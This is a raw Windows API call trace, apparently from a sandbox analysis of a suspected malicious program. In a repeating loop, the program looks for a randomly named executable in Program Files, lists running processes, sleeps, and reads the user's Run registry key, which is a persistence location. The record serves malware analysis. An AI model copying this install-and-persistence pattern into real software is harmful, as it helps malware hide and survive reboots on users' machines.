[0297.679] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.679] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0297.679] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.679] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.679] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0297.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0297.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0297.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0297.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0297.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0297.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0297.835] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0297.836] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0297.837] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0297.837] NtClose (Handle=0x338) returned 0x0 [0297.837] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.837] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.837] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0297.837] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.837] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.838] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0297.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0297.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0297.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0297.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0297.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0297.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0297.937] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0297.939] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0297.940] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0297.940] NtClose (Handle=0x338) returned 0x0 [0297.940] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.940] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.940] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0297.940] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0297.940] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0297.940] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0297.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0297.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0297.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0297.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0297.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0298.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0298.041] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0298.043] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0298.043] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0298.043] NtClose (Handle=0x338) returned 0x0 [0298.043] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.043] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.043] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0298.043] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.043] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.043] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0298.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0298.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0298.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0298.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0298.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0298.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0298.152] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0298.154] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0298.155] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0298.155] NtClose (Handle=0x338) returned 0x0 [0298.155] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.155] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.156] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0298.156] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.156] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.156] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0298.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0298.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0298.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0298.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0298.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0298.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0298.257] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0298.258] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0298.259] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0298.259] NtClose (Handle=0x338) returned 0x0 [0298.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.259] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.259] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0298.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.259] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.259] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0298.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0298.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0298.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0298.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0298.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0298.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0298.361] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0298.362] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0298.362] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0298.362] NtClose (Handle=0x338) returned 0x0 [0298.363] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.363] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.363] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de2a0) returned 1 [0298.363] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.363] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.363] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0298.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0298.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0298.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0298.366] NtAllocateVirtualMemory 